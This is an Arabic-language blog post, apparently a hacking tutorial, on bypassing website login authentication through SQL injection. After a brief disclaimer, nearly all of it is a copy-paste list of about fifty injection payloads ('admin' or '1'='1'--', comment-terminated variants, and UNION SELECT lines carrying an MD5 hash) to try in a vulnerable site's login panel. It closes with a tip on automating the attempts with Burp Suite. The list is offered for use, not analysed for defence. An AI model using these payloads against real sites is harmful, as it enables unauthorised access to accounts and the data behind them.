bypass Authentication : SQL Injection

Bypass Authentication : Sql Injection

الســــــــــــلام عليكــم و رحمة الله و بركــــــــــــاتــه

" المقال ليس لتحفيز و مساعدة الهكر لارتكاب الجرائم الإلكترونية بل هو من باب العلم بالأمور "

في كثير من الأحيان بعد اكتشاف وجود ثغرة SQL Injection  في موقع أو تطبيق في الويب تكون أول خطوة هي تجربة مجموعة من الأكواد ان صح التعبير و ادخها في لوحة التحكم لاستخراج البيانات و التحكم في الموقع و قد تعطي نتائج غير متوقعة .

يمكن تجربة القائمة أسفله بدون استعمال أي برنامج :

القــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــائمة :

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234" AND 1=0 UNION ALL SELECT "admin","81dc9bdb52d04dc20036dbd8313ed055

يمكن جعل تجربة هذه الكلمات أوتوماتيكيا باستعمال برنامج Burpe Suite .

انتهى الدرس و السلام عليكم

المرجوا ذكر المصدر قبل النسخ حتى لا يضيع التعب هباء

ومرحبا باستفساراتكم ....